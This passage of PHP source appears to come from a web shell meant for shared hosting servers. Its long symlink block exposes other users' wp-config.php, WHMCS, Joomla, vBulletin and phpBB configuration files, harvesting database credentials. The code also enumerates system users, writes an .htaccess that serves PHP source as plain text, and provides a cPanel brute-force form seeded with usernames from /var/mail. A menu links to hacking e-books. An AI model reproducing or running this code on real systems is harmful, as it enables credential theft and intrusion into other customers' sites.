                symlink('/home2/' . $usern . '/public_html/billing/configuration.php', $pdomain . '~~Whm6.txt');
                symlink('/home2/' . $usern . '/public_html/clients/configuration.php', $pdomain . '~~Whm7.txt');
                symlink('/home2/' . $usern . '/public_html/whmcs/configuration.php', $pdomain . '~~Whm8.txt');
                symlink('/home2/' . $usern . '/public_html/order/configuration.php', $pdomain . '~~Whm9.txt');
                symlink('/home2/' . $usern . '/public_html/admin/conf.php', $pdomain . '~~5.txt');
                symlink('/home2/' . $usern . '/public_html/admin/config.php', $pdomain . '~~4.txt');
                symlink('/home2/' . $usern . '/public_html/conf_global.php', $pdomain . '~~invisio.txt');
                symlink('/home2/' . $usern . '/public_html/include/db.php', $pdomain . '~~7.txt');
                symlink('/home2/' . $usern . '/public_html/connect.php', $pdomain . '~~8.txt');
                symlink('/home2/' . $usern . '/public_html/mk_conf.php', $pdomain . '~~mk-portale1.txt');
                symlink('/home2/' . $usern . '/public_html/include/config.php', $pdomain . '~~12.txt');
                symlink('/home2/' . $usern . '/public_html/settings.php', $pdomain . '~~Smf.txt');
                symlink('/home2/' . $usern . '/public_html/includes/functions.php', $pdomain . '~~phpbb3.txt');
                symlink('/home2/' . $usern . '/public_html/include/db.php', $pdomain . '~~infinity.txt');
                symlink('/home3/' . $usern . '/public_html/vb/includes/config.php', $pdomain . '~~vBulletin1.txt');
                symlink('/home3/' . $usern . '/public_html/includes/config.php', $pdomain . '~~vBulletin2.txt');
                symlink('/home3/' . $usern . '/public_html/forum/includes/config.php', $pdomain . '~~vBulletin3.txt');
                symlink('/home3/' . $usern . '/public_html/cc/includes/config.php', $pdomain . '~~vBulletin4.txt');
                symlink('/home3/' . $usern . '/public_html/config.php', $pdomain . '~~Phpbb1.txt');
                symlink('/home3/' . $usern . '/public_html/forum/includes/config.php', $pdomain . '~~Phpbb2.txt');
                symlink('/home3/' . $usern . '/public_html/wp-config.php', $pdomain . '~~Wordpress1.txt');
                symlink('/home3/' . $usern . '/public_html/blog/wp-config.php', $pdomain . '~~Wordpress2.txt');
                symlink('/home3/' . $usern . '/public_html/configuration.php', $pdomain . '~~Joomla1.txt');
                symlink('/home3/' . $usern . '/public_html/blog/configuration.php', $pdomain . '~~Joomla2.txt');
                symlink('/home3/' . $usern . '/public_html/joomla/configuration.php', $pdomain . '~~Joomla3.txt');
                symlink('/home3/' . $usern . '/public_html/whm/configuration.php', $pdomain . '~~Whm1.txt');
                symlink('/home3/' . $usern . '/public_html/whmc/configuration.php', $pdomain . '~~Whm2.txt');
                symlink('/home3/' . $usern . '/public_html/support/configuration.php', $pdomain . '~~Whm3.txt');
                symlink('/home3/' . $usern . '/public_html/client/configuration.php', $pdomain . '~~Whm4.txt');
                symlink('/home3/' . $usern . '/public_html/billings/configuration.php', $pdomain . '~~Whm5.txt');
                symlink('/home3/' . $usern . '/public_html/billing/configuration.php', $pdomain . '~~Whm6.txt');
                symlink('/home3/' . $usern . '/public_html/clients/configuration.php', $pdomain . '~~Whm7.txt');
                symlink('/home3/' . $usern . '/public_html/whmcs/configuration.php', $pdomain . '~~Whm8.txt');
                symlink('/home3/' . $usern . '/public_html/order/configuration.php', $pdomain . '~~Whm9.txt');
                symlink('/home3/' . $usern . '/public_html/admin/conf.php', $pdomain . '~~5.txt');
                symlink('/home3/' . $usern . '/public_html/admin/config.php', $pdomain . '~~4.txt');
                symlink('/home3/' . $usern . '/public_html/conf_global.php', $pdomain . '~~invisio.txt');
                symlink('/home3/' . $usern . '/public_html/include/db.php', $pdomain . '~~7.txt');
                symlink('/home3/' . $usern . '/public_html/connect.php', $pdomain . '~~8.txt');
                symlink('/home3/' . $usern . '/public_html/mk_conf.php', $pdomain . '~~mk-portale1.txt');
                symlink('/home3/' . $usern . '/public_html/include/config.php', $pdomain . '~~12.txt');
                symlink('/home3/' . $usern . '/public_html/settings.php', $pdomain . '~~Smf.txt');
                symlink('/home3/' . $usern . '/public_html/includes/functions.php', $pdomain . '~~phpbb3.txt');
                symlink('/home3/' . $usern . '/public_html/include/db.php', $pdomain . '~~infinity.txt');
                symlink('/home4/' . $usern . '/public_html/vb/includes/config.php', $pdomain . '~~vBulletin1.txt');
                symlink('/home4/' . $usern . '/public_html/includes/config.php', $pdomain . '~~vBulletin2.txt');
                symlink('/home4/' . $usern . '/public_html/forum/includes/config.php', $pdomain . '~~vBulletin3.txt');
                symlink('/home4/' . $usern . '/public_html/cc/includes/config.php', $pdomain . '~~vBulletin4.txt');
                symlink('/home4/' . $usern . '/public_html/config.php', $pdomain . '~~Phpbb1.txt');
                symlink('/home4/' . $usern . '/public_html/forum/includes/config.php', $pdomain . '~~Phpbb2.txt');
                symlink('/home4/' . $usern . '/public_html/wp-config.php', $pdomain . '~~Wordpress1.txt');
                symlink('/home4/' . $usern . '/public_html/blog/wp-config.php', $pdomain . '~~Wordpress2.txt');
                symlink('/home4/' . $usern . '/public_html/configuration.php', $pdomain . '~~Joomla1.txt');
                symlink('/home4/' . $usern . '/public_html/blog/configuration.php', $pdomain . '~~Joomla2.txt');
                symlink('/home4/' . $usern . '/public_html/joomla/configuration.php', $pdomain . '~~Joomla3.txt');
                symlink('/home4/' . $usern . '/public_html/whm/configuration.php', $pdomain . '~~Whm1.txt');
                symlink('/home4/' . $usern . '/public_html/whmc/configuration.php', $pdomain . '~~Whm2.txt');
                symlink('/home4/' . $usern . '/public_html/support/configuration.php', $pdomain . '~~Whm3.txt');
                symlink('/home4/' . $usern . '/public_html/client/configuration.php', $pdomain . '~~Whm4.txt');
                symlink('/home4/' . $usern . '/public_html/billings/configuration.php', $pdomain . '~~Whm5.txt');
                symlink('/home4/' . $usern . '/public_html/billing/configuration.php', $pdomain . '~~Whm6.txt');
                symlink('/home4/' . $usern . '/public_html/clients/configuration.php', $pdomain . '~~Whm7.txt');
                symlink('/home4/' . $usern . '/public_html/whmcs/configuration.php', $pdomain . '~~Whm8.txt');
                symlink('/home4/' . $usern . '/public_html/order/configuration.php', $pdomain . '~~Whm9.txt');
                symlink('/home4/' . $usern . '/public_html/admin/conf.php', $pdomain . '~~5.txt');
                symlink('/home4/' . $usern . '/public_html/admin/config.php', $pdomain . '~~4.txt');
                symlink('/home4/' . $usern . '/public_html/conf_global.php', $pdomain . '~~invisio.txt');
                symlink('/home4/' . $usern . '/public_html/include/db.php', $pdomain . '~~7.txt');
                symlink('/home4/' . $usern . '/public_html/connect.php', $pdomain . '~~8.txt');
                symlink('/home4/' . $usern . '/public_html/mk_conf.php', $pdomain . '~~mk-portale1.txt');
                symlink('/home4/' . $usern . '/public_html/include/config.php', $pdomain . '~~12.txt');
                symlink('/home4/' . $usern . '/public_html/settings.php', $pdomain . '~~Smf.txt');
                symlink('/home4/' . $usern . '/public_html/includes/functions.php', $pdomain . '~~phpbb3.txt');
                symlink('/home4/' . $usern . '/public_html/include/db.php', $pdomain . '~~infinity.txt');
                symlink('/home5/' . $usern . '/public_html/vb/includes/config.php', $pdomain . '~~vBulletin1.txt');
                symlink('/home5/' . $usern . '/public_html/includes/config.php', $pdomain . '~~vBulletin2.txt');
                symlink('/home5/' . $usern . '/public_html/forum/includes/config.php', $pdomain . '~~vBulletin3.txt');
                symlink('/home5/' . $usern . '/public_html/cc/includes/config.php', $pdomain . '~~vBulletin4.txt');
                symlink('/home5/' . $usern . '/public_html/config.php', $pdomain . '~~Phpbb1.txt');
                symlink('/home5/' . $usern . '/public_html/forum/includes/config.php', $pdomain . '~~Phpbb2.txt');
                symlink('/home5/' . $usern . '/public_html/wp-config.php', $pdomain . '~~Wordpress1.txt');
                symlink('/home5/' . $usern . '/public_html/blog/wp-config.php', $pdomain . '~~Wordpress2.txt');
                symlink('/home5/' . $usern . '/public_html/configuration.php', $pdomain . '~~Joomla1.txt');
                symlink('/home5/' . $usern . '/public_html/blog/configuration.php', $pdomain . '~~Joomla2.txt');
                symlink('/home5/' . $usern . '/public_html/joomla/configuration.php', $pdomain . '~~Joomla3.txt');
                symlink('/home5/' . $usern . '/public_html/whm/configuration.php', $pdomain . '~~Whm1.txt');
                symlink('/home5/' . $usern . '/public_html/whmc/configuration.php', $pdomain . '~~Whm2.txt');
                symlink('/home5/' . $usern . '/public_html/support/configuration.php', $pdomain . '~~Whm3.txt');
                symlink('/home5/' . $usern . '/public_html/client/configuration.php', $pdomain . '~~Whm4.txt');
                symlink('/home5/' . $usern . '/public_html/billings/configuration.php', $pdomain . '~~Whm5.txt');
                symlink('/home5/' . $usern . '/public_html/billing/configuration.php', $pdomain . '~~Whm6.txt');
                symlink('/home5/' . $usern . '/public_html/clients/configuration.php', $pdomain . '~~Whm7.txt');
                symlink('/home5/' . $usern . '/public_html/whmcs/configuration.php', $pdomain . '~~Whm8.txt');
                symlink('/home5/' . $usern . '/public_html/order/configuration.php', $pdomain . '~~Whm9.txt');
                symlink('/home5/' . $usern . '/public_html/admin/conf.php', $pdomain . '~~5.txt');
                symlink('/home5/' . $usern . '/public_html/admin/config.php', $pdomain . '~~4.txt');
                symlink('/home5/' . $usern . '/public_html/conf_global.php', $pdomain . '~~invisio.txt');
                symlink('/home5/' . $usern . '/public_html/include/db.php', $pdomain . '~~7.txt');
                symlink('/home5/' . $usern . '/public_html/connect.php', $pdomain . '~~8.txt');
                symlink('/home5/' . $usern . '/public_html/mk_conf.php', $pdomain . '~~mk-portale1.txt');
                symlink('/home5/' . $usern . '/public_html/include/config.php', $pdomain . '~~12.txt');
                symlink('/home5/' . $usern . '/public_html/settings.php', $pdomain . '~~Smf.txt');
                symlink('/home5/' . $usern . '/public_html/includes/functions.php', $pdomain . '~~phpbb3.txt');
                symlink('/home5/' . $usern . '/public_html/include/db.php', $pdomain . '~~infinity.txt');
                symlink('/home6/' . $usern . '/public_html/vb/includes/config.php', $pdomain . '~~vBulletin1.txt');
                symlink('/home6/' . $usern . '/public_html/includes/config.php', $pdomain . '~~vBulletin2.txt');
                symlink('/home6/' . $usern . '/public_html/forum/includes/config.php', $pdomain . '~~vBulletin3.txt');
                symlink('/home6/' . $usern . '/public_html/cc/includes/config.php', $pdomain . '~~vBulletin4.txt');
                symlink('/home6/' . $usern . '/public_html/config.php', $pdomain . '~~Phpbb1.txt');
                symlink('/home6/' . $usern . '/public_html/forum/includes/config.php', $pdomain . '~~Phpbb2.txt');
                symlink('/home6/' . $usern . '/public_html/wp-config.php', $pdomain . '~~Wordpress1.txt');
                symlink('/home6/' . $usern . '/public_html/blog/wp-config.php', $pdomain . '~~Wordpress2.txt');
                symlink('/home6/' . $usern . '/public_html/configuration.php', $pdomain . '~~Joomla1.txt');
                symlink('/home6/' . $usern . '/public_html/blog/configuration.php', $pdomain . '~~Joomla2.txt');
                symlink('/home6/' . $usern . '/public_html/joomla/configuration.php', $pdomain . '~~Joomla3.txt');
                symlink('/home6/' . $usern . '/public_html/whm/configuration.php', $pdomain . '~~Whm1.txt');
                symlink('/home6/' . $usern . '/public_html/whmc/configuration.php', $pdomain . '~~Whm2.txt');
                symlink('/home6/' . $usern . '/public_html/support/configuration.php', $pdomain . '~~Whm3.txt');
                symlink('/home6/' . $usern . '/public_html/client/configuration.php', $pdomain . '~~Whm4.txt');
                symlink('/home6/' . $usern . '/public_html/billings/configuration.php', $pdomain . '~~Whm5.txt');
                symlink('/home6/' . $usern . '/public_html/billing/configuration.php', $pdomain . '~~Whm6.txt');
                symlink('/home6/' . $usern . '/public_html/clients/configuration.php', $pdomain . '~~Whm7.txt');
                symlink('/home6/' . $usern . '/public_html/whmcs/configuration.php', $pdomain . '~~Whm8.txt');
                symlink('/home6/' . $usern . '/public_html/order/configuration.php', $pdomain . '~~Whm9.txt');
                symlink('/home6/' . $usern . '/public_html/admin/conf.php', $pdomain . '~~5.txt');
                symlink('/home6/' . $usern . '/public_html/admin/config.php', $pdomain . '~~4.txt');
                symlink('/home6/' . $usern . '/public_html/conf_global.php', $pdomain . '~~invisio.txt');
                symlink('/home6/' . $usern . '/public_html/include/db.php', $pdomain . '~~7.txt');
                symlink('/home6/' . $usern . '/public_html/connect.php', $pdomain . '~~8.txt');
                symlink('/home6/' . $usern . '/public_html/mk_conf.php', $pdomain . '~~mk-portale1.txt');
                symlink('/home6/' . $usern . '/public_html/include/config.php', $pdomain . '~~12.txt');
                symlink('/home6/' . $usern . '/public_html/settings.php', $pdomain . '~~Smf.txt');
                symlink('/home6/' . $usern . '/public_html/includes/functions.php', $pdomain . '~~phpbb3.txt');
                symlink('/home6/' . $usern . '/public_html/include/db.php', $pdomain . '~~infinity.txt');
                symlink('/home7/' . $usern . '/public_html/vb/includes/config.php', $pdomain . '~~vBulletin1.txt');
                symlink('/home7/' . $usern . '/public_html/includes/config.php', $pdomain . '~~vBulletin2.txt');
                symlink('/home7/' . $usern . '/public_html/forum/includes/config.php', $pdomain . '~~vBulletin3.txt');
                symlink('/home7/' . $usern . '/public_html/cc/includes/config.php', $pdomain . '~~vBulletin4.txt');
                symlink('/home7/' . $usern . '/public_html/config.php', $pdomain . '~~Phpbb1.txt');
                symlink('/home7/' . $usern . '/public_html/forum/includes/config.php', $pdomain . '~~Phpbb2.txt');
                symlink('/home7/' . $usern . '/public_html/wp-config.php', $pdomain . '~~Wordpress1.txt');
                symlink('/home7/' . $usern . '/public_html/blog/wp-config.php', $pdomain . '~~Wordpress2.txt');
                symlink('/home7/' . $usern . '/public_html/configuration.php', $pdomain . '~~Joomla1.txt');
                symlink('/home7/' . $usern . '/public_html/blog/configuration.php', $pdomain . '~~Joomla2.txt');
                symlink('/home7/' . $usern . '/public_html/joomla/configuration.php', $pdomain . '~~Joomla3.txt');
                symlink('/home7/' . $usern . '/public_html/whm/configuration.php', $pdomain . '~~Whm1.txt');
                symlink('/home7/' . $usern . '/public_html/whmc/configuration.php', $pdomain . '~~Whm2.txt');
                symlink('/home7/' . $usern . '/public_html/support/configuration.php', $pdomain . '~~Whm3.txt');
                symlink('/home7/' . $usern . '/public_html/client/configuration.php', $pdomain . '~~Whm4.txt');
                symlink('/home7/' . $usern . '/public_html/billings/configuration.php', $pdomain . '~~Whm5.txt');
                symlink('/home7/' . $usern . '/public_html/billing/configuration.php', $pdomain . '~~Whm6.txt');
                symlink('/home7/' . $usern . '/public_html/clients/configuration.php', $pdomain . '~~Whm7.txt');
                symlink('/home7/' . $usern . '/public_html/whmcs/configuration.php', $pdomain . '~~Whm8.txt');
                symlink('/home7/' . $usern . '/public_html/order/configuration.php', $pdomain . '~~Whm9.txt');
                symlink('/home7/' . $usern . '/public_html/admin/conf.php', $pdomain . '~~5.txt');
                symlink('/home7/' . $usern . '/public_html/admin/config.php', $pdomain . '~~4.txt');
                symlink('/home7/' . $usern . '/public_html/conf_global.php', $pdomain . '~~invisio.txt');
                symlink('/home7/' . $usern . '/public_html/include/db.php', $pdomain . '~~7.txt');
                symlink('/home7/' . $usern . '/public_html/connect.php', $pdomain . '~~8.txt');
                symlink('/home7/' . $usern . '/public_html/mk_conf.php', $pdomain . '~~mk-portale1.txt');
                symlink('/home7/' . $usern . '/public_html/include/config.php', $pdomain . '~~12.txt');
                symlink('/home7/' . $usern . '/public_html/settings.php', $pdomain . '~~Smf.txt');
                symlink('/home7/' . $usern . '/public_html/includes/functions.php', $pdomain . '~~phpbb3.txt');
                symlink('/home7/' . $usern . '/public_html/include/db.php', $pdomain . '~~infinity.txt');
            }
            $d0mains = @file("/etc/named.conf");
            if ($d0mains) {
                mkdir($fn);
                chdir($fn);
                foreach ($d0mains as $d0main) {
                    if (eregi("zone", $d0main)) {
                        preg_match_all('#zone "(.*)"#', $d0main, $domains);
                        flush();
                        if (strlen(trim($domains[1][0])) > 2) {
                            $user = posix_getpwuid(@fileowner("/etc/valiases/" . $domains[1][0]));
                            syml($user['name'], $domains[1][0]);
                        }
                    }
                }
                echo "<center><font color=lime size=3>[ Done ]</font></center>";
                echo "<br><center><a href={$fn}/ target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
            } else {
                mkdir($fn);
                chdir($fn);
                $temp = "";
                $val1 = 0;
                $val2 = 1000;
                for (; $val1 <= $val2; $val1++) {
                    $uid = @posix_getpwuid($val1);
                    if ($uid) {
                        $temp .= join(':', $uid) . "\n";
                    }
                }
                echo "<br/>";
                $temp = trim($temp);
                $file5 = fopen("test.txt", "w");
                fputs($file5, $temp);
                fclose($file5);
                $htaccess = 'T3B0aW9ucyBhbGwgCkRpcmVjdG9yeUluZGV4IHJlYWRtZS5odG1sIApBZGRUeXBlIHRleHQvcGxh
aW4gLnBocCAKQWRkSGFuZGxlciBzZXJ2ZXItcGFyc2VkIC5waHAgCkFkZFR5cGUgdGV4dC9wbGFp
biAuaHRtbCAKQWRkSGFuZGxlciB0eHQgLmh0bWwgClJlcXVpcmUgTm9uZSAKU2F0aXNmeSBBbnk=
';
                $file = fopen(".htaccess", "w+");
                $write = fwrite($file, "Options all \nDirectoryIndex readme.html \nAddType text/plain .php \nAddHandler server-parsed .php \nAddType text/plain .html \nAddHandler txt .html \nRequire None \nSatisfy Any");
                $file = fopen("test.txt", "r") or exit("Unable to open file!");
                while (!feof($file)) {
                    $s = fgets($file);
                    $matches = array();
                    $t = preg_match('/\\/(.*?)\\:\\//s', $s, $matches);
                    $matches = str_replace("home/", "", $matches[1]);
                    if (strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") {
                        continue;
                    }
                    syml($matches, $matches);
                }
                fclose($file);
                echo "</table>";
                unlink("test.txt");
                echo "<center><font color=lime size=3>[ Done ]</font></center>";
                echo "<br><center><a href={$fn}/ target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
            }
            echo "<hr><center><b><a href=" . $_SERVER['PHP_SELF'] . ">BACK</a>";
            exit;
        }
        ?>
<form method="POST" target="_blank">
	<strong>
<input name="page" type="hidden" value="find"><table>      				
    </strong><br><br><center><font size="5" style="italic" color="#00ff00">=[ Cpanel BruteForce ]=</font></center><br><br>
    <table width="600" border="0" cellpadding="3" cellspacing="1" align="center">
	<tr>
	<td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
	<center><b><font size="5" style="italic" color="#00ff00">Cpanel BruteForce</font></b></center></td></tr>
    <tr>
    <td>
    <table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">
    <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
	<strong>User :</strong></td>
    <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="79" class ='inputz' rows="10" name="usernames"><?php 
        system('ls /var/mail');
        ?></textarea></strong></td>
    </tr>
    <tr>
    <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
	<strong>Pass :</strong></td>
    <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="79" class ='inputz' rows="10" name="passwords"></textarea></strong></td>
    </tr>
    <tr>
    <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
	<strong>Type :</strong></td>
    <td valign="top" bgcolor="#151515" colspan="5">
    <span class="style2"><strong>Simple : </strong> </span>
	<strong>
	<input type="radio" name="type" value="simple" checked="checked" class="style3"></strong>
    <font class="style2"><strong>/etc/passwd : </strong> </font>
	<strong>
	<input type="radio" name="type" value="passwd" class="style3"></strong><span class="style3"><strong>
	</strong>
	</span>
    </td>
    </tr>
    <tr>
    <td valign="top" bgcolor="#151515" style="width: 139px"></td>
    <td valign="top" bgcolor="#151515"  colspan="5"><strong><input class ='inputzbut' type="submit" value="start">
    </strong>
    </td>
    <tr>
</form> 
<tr>
    <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Get Config :</strong></td>
    				</tr>
<form method="POST" target="_blank">
	<strong>
<input name="mendapatkan" type="hidden" value="passwd">        				
    </strong>
    <tr>
    <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Folder Name :</strong></td>
    <td valign="top" bgcolor="#151515"><strong><input class ='inputz' size="35" name="foldername" type="text"></strong></td>
	</strong>
    </td>
    </tr>
    <tr>
    <td valign="top" bgcolor="#151515" style="width: 139px"></td>
    <td valign="top" bgcolor="#151515" colspan="5"><strong><input class ='inputzbut' type="submit" value="GO">
    </strong>
    </td>
    <tr>
</form>   
<tr>
    <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Get Wordlist</strong></td>
    				</tr>
<form method="POST" target="_blank">
	<strong>
<input name="pass" type="hidden" value="password">        				
    </strong>
    <tr>
    <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Url Config :</strong></td>
    <td valign="top" bgcolor="#151515"><strong><input class ='inputz' size="35" name="url" type="text"></strong></td>
	</strong>
    </td>
    </tr>
    <tr>
    <td valign="top" bgcolor="#151515" style="width: 139px"></td>
    <td valign="top" bgcolor="#151515" colspan="5"><strong><input class ='inputzbut' type="submit" value="GO">
    </strong>
    </td>
    <tr>
</form>
<tr>
    <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Info 
	Security</strong></td>
    				</tr>
    <tr>
    <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Safe Mode</strong></td>
    <td valign="top" bgcolor="#151515" colspan="5">
	<strong>
<?php 
        $safe_mode = ini_get('safe_mode');
        if ($safe_mode == '1') {
            echo "ON";
        } else {
            echo "OFF";
        }
        ?>	
	</strong>	
	</td>
    				</tr>
    <tr>
    <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Desible Function</strong></td>
    <td valign="top" bgcolor="#151515" colspan="5">
	<strong>
<form method="POST" target="_blank">
	<strong>
<input name="matikan" type="hidden" value="sekatan">        				
    </strong>

<?php 
        if ('' == ($func = @ini_get('disable_functions'))) {
            echo "<font color=#00ff00>No Security for Function</font></b>";
        } else {
            echo "<script>alert(\"Please see below and press >Please Click Here First!<\");</script>";
            echo "<font color=red>{$func}</font></b>";
            echo "<tr><td valign=\"top\" bgcolor=\"#151515\" style=\"width: 139px\"></td>";
            echo "<td valign=\"top\" bgcolor=\"#151515\" colspan=\"5\"><strong><input type=\"submit\" value=\"Please Click Here First!\">\r\n    </strong>\r\n    </td></tr>";
        }
        ?></strong></td></tr></table></table></table>
<?php 
    } elseif (isset($_GET['x']) && $_GET['x'] == 'tutor') {
        ?>
	<form action="?y=<?php 
        echo $pwd;
        ?>&x=tutor" method="post">
	<center><br><br><b>+--=[ Tutorial & Ebook hacking ]=--+</b><br>
		<form method="post" action="">
<table class="tabnet" border="1" >
<tr>
		<td align="center">English</td><td align="center">Indonesian</td>
	</tr>
	<tr>
		<td><form method="post" action="">&nbsp;
	E-book Hacking &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;
	<select class="inputzbut" name="pilih" id="pilih">
	<option value=""selected>-----------------[ Select ]-----------------</option>
	<option value="tutorial24" > Hacking Exposed-5 </option>
	<option value="tutorial25"> Internet Denial Of Service </option>
	<option value="tutorial26">Computer Viruses For Dummies</option>
	<option value="tutorial27">Hack Attacks Testing</option>
	<option value="tutorial28">Secrets Of A Super Hacker</option>
	<option value="tutorial29">Stealing The Network</option>
	<option value="tutorial30">Hacker's HandBook</option>
	</select>
	<input  type="submit" name="submit" class="inputzbut" value="Download">
	</td></form>
<td><form method="post" action="">&nbsp;
Tutorial by X'1N73CT &nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;
	<select class="inputzbut"  name="pilih" id="pilih">
	<option value=""selected>-----------------[ Select ]-----------------</option>
		<option value="tutorial2">Search Engine Hacking</option>
		<option value="tutorial3">SQL Injection dengan hackbar</option>
		<option value="tutorial1" >Bypass Union</option>
	</select>
	<input  type="submit" name="submit" class="inputzbut" value="Download">
</form></td>
</tr>
<tr>
<td>
<form method="post" action="">&nbsp;
E-Book from Syn|gress &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;
	<select class="inputzbut"  name="pilih" id="pilih">
	<option value=""selected>-----------------[ Select ]-----------------</option>
	<option value="cryptography_for_defeloper">Cryptography for Developer</option>
	<option value="tutorial31">Mobile Malware Attack and Defense</option>
	<option value="forensic">CD and DVD Forensic</option>
	<option value="ddd">Open Sourch Security Tools</option>
	<option value="metasploit">Metaslpoit Toolkit</option>
	<option value="stealing_network">Stealing the Network</option>
	<option value="security_polices">Creating Security Polices</option>
	</select>
	<input  type="submit" name="submit" class="inputzbut" value="Download">
</form></td>
<td>
<form method="post" action="">&nbsp;
X-CODE MAGAZINE &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;
	<select class="inputzbut" name="pilih" id="pilih">
	<option value=""selected>-----------------[ Select ]-----------------</option>
	<option value="tutorial4">X-CODE MAGAZINE 1</option>
	<option value="tutorial5">X-CODE MAGAZINE 2</option>
	<option value="tutorial6">X-CODE MAGAZINE 3</option>
	<option value="tutorial7">X-CODE MAGAZINE 4</option>
	<option value="tutorial8">X-CODE MAGAZINE 5</option>
	<option value="tutorial9">X-CODE MAGAZINE 6</option>
	<option value="tutorial10">X-CODE MAGAZINE 7</option>
	<option value="tutorial11">X-CODE MAGAZINE 8</option>
	<option value="tutorial12">X-CODE MAGAZINE 9</option>
	<option value="tutorial13">X-CODE MAGAZINE 10</option>
	<option value="tutorial14">X-CODE MAGAZINE 11</option>
	<option value="tutorial15">X-CODE MAGAZINE 12</option>
	<option value="tutorial16">X-CODE MAGAZINE 13</option>
	<option value="tutorial17">X-CODE MAGAZINE 14</option>
	<option value="tutorial18">X-CODE MAGAZINE 15</option>
	<option value="tutorial19">X-CODE MAGAZINE 16</option>
	<option value="tutorial20">X-CODE MAGAZINE 17</option>
	<option value="tutorial21">X-CODE MAGAZINE 18</option>
	<option value="tutorial22">X-CODE MAGAZINE 19</option>
	<option value="tutorial23">X-CODE MAGAZINE 20</option>
	<option value="tutorial024">X-CODE MAGAZINE 21</option>
	</select>
	<input type="submit" name="submit" class="inputzbut" value="Download" ></a>
</form></td></tr></table><br><br>
<?php 
        $submit = $_POST['submit'];
        if (isset($submit)) {
            $pilih = $_POST['pilih'];
            if ($pilih == 'tutorial1') {
                ?>
			<script>
				document.location = 'http://www.pharmconseil-elearning.com/main/upload/by_passing_illegal_mix_of_collations_for_operation__union__by_x_1n73ct.pdf';
			</script>
			<?php 
            } elseif ($pilih == 'tutorial2') {
                ?>
			<script>
				document.location = 'http://www.pharmconseil-elearning.com/main/upload/Search_engine_hacking_by_x_1n73ct.pdf';
			</script>
			<?php 
            } elseif ($pilih == 'tutorial3') {
                ?>
			<script>
				document.location = 'http://www.pharmconseil-elearning.com/main/upload/Sql_injection_dengan_hackbar.pdf';
			</script>
			<?php 
            } elseif ($pilih == 'tutorial4') {
                ?>
			<script>
				document.location = 'http://xcode.or.id/files/xcode_magazine_1.zip';
			</script>
			<?php 
            } elseif ($pilih == 'tutorial5') {
                ?>
			<script>
				document.location = 'http://xcode.or.id/files/xcode_magazine_2.zip';
			</script>
			<?php 
            } elseif ($pilih == 'tutorial6') {
                ?>
			<script>
				document.location = 'http://xcode.or.id/files/xcode_magazine_3.zip';
			</script>
			<?php 
            } elseif ($pilih == 'tutorial7') {
                ?>
			<script>
				document.location = 'http://xcode.or.id/files/xcode_magazine_4.zip';
			</script>
			<?php 
            } elseif ($pilih == 'tutorial8') {
                ?>
			<script>
				document.location = 'http://xcode.or.id/files/xcode_magazine_5.rar';
			</script>
			<?php 
            } elseif ($pilih == 'tutorial9') {
                ?>
			<script>
				document.location = 'http://xcode.or.id/files/xcode_magazine_6.rar';
			</script>
			<?php 
            } elseif ($pilih == 'tutorial10') {
                ?>
			<script>
				document.location = 'http://xcode.or.id/files/xcode_magazine_7.rar';
			</script>
			<?php 
            } elseif ($pilih == 'tutorial11') {
                ?>
			<script>
				document.location = 'http://xcode.or.id/files/xcode_magazine_8.rar';
			</script>
			<?php 
            } elseif ($pilih == 'tutorial12') {
                ?>
			<script>
				document.location = 'http://xcode.or.id/files/xcode9.zip';
			</script>
			<?php 
            } elseif ($pilih == 'tutorial13') {
                ?>
			<script>
				document.location = 'http://xcode.or.id/files/xcode10.zip';
			</script>
			<?php 
            } elseif ($pilih == 'tutorial14') {
                ?>
			<script>
				document.location = 'http://xcode.or.id/files/xcode11.zip';
			</script>
			<?php 
            } elseif ($pilih == 'tutorial15') {
                ?>
			<script>
				document.location = 'http://xcode.or.id/files/Xcode12.zip';
			</script>
			<?php 
            } elseif ($pilih == 'tutorial16') {
                ?>
			<script>
				document.location = 'http://xcode.or.id/files/Xcode13.zip';
			</script>
			<?php 
            } elseif ($pilih == 'tutorial17') {
                ?>
			<script>
				document.location = 'http://xcode.or.id/files/Xcode14.zip';
			</script>
			<?php 
            } elseif ($pilih == 'tutorial18') {
                ?>
			<script>
				document.location = 'http://xcode.or.id/Xcode15.zip';
			</script>
			<?php 
            } elseif ($pilih == 'tutorial19') {
                ?>
			<script>
				document.location = 'http://xcode.or.id/xcode_magazine_16.zip';
			</script>
			<?php 
            } elseif ($pilih == 'tutorial20') {
                ?>
			<script>
				document.location = 'http://xcode.or.id/xcode_magazine_17.zip';
			</script>
			<?php 
            } elseif ($pilih == 'tutorial21') {
                ?>
			<script>
				document.location = 'http://xcode.or.id/xcode_magazine_18.zip';
			</script>
			<?php 
            } elseif ($pilih == 'tutorial22') {
                ?>
			<script>
				document.location = 'http://xcode.or.id/xcode_magazine_19.zip';
			</script>
			<?php 
            } elseif ($pilih == 'tutorial23') {
                ?>
			<script>
				document.location = 'http://xcode.or.id/xcode_magazine_20.zip';
			</script>
			<?php 
            } elseif ($pilih == 'tutorial024') {
                ?>
			<script>
